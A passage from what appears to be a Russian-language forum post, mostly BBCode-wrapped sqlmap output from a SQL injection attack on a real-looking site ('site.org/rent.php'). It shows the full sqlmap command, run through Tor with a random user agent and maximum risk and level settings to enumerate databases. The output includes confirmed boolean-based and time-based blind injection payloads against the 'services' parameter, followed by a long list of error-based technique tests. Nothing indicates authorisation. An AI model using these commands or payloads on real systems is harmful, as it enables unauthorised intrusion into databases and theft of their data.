[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched data logged to text files under[/COLOR][COLOR="#DD0000"]'output\site.org'
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]ending[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[/COLOR][/COLOR]
Попробовал с --dbms=MySQL:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]py[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]random[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]SOCKS5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]risk[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]hex[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]MySQL[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbs
___
__H__
___ ___[/COLOR][COLOR="#007700"][.][/COLOR][COLOR="#0000BB"]_____ ___ ___[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]1.3.9.9[/COLOR][COLOR="#FF8000"]#dev}
[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]-| . [[/COLOR][COLOR="#DD0000"]"] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by
this program
[*] starting @ 15:27:55 /2019-09-14/
[15:27:55] [INFO] setting Tor SOCKS proxy settings
[15:27:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, lik
e Gecko) Chrome/11.0.696.68 Safari/534.24' from file 'user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:27:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 6284=6284&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 5287 FROM (SELECT(SLEEP(
15)))FhgH)&timereset=2
---
[15:28:00] [INFO] testing MySQL
[15:28:00] [INFO] confirming MySQL
[15:28:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.2 (MariaDB fork)
[15:28:03] [WARNING] information_schema not available, back-end DBMS is MySQL = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]57[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]04[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL AND error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL OR error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird AND error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird OR error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase inline queries'
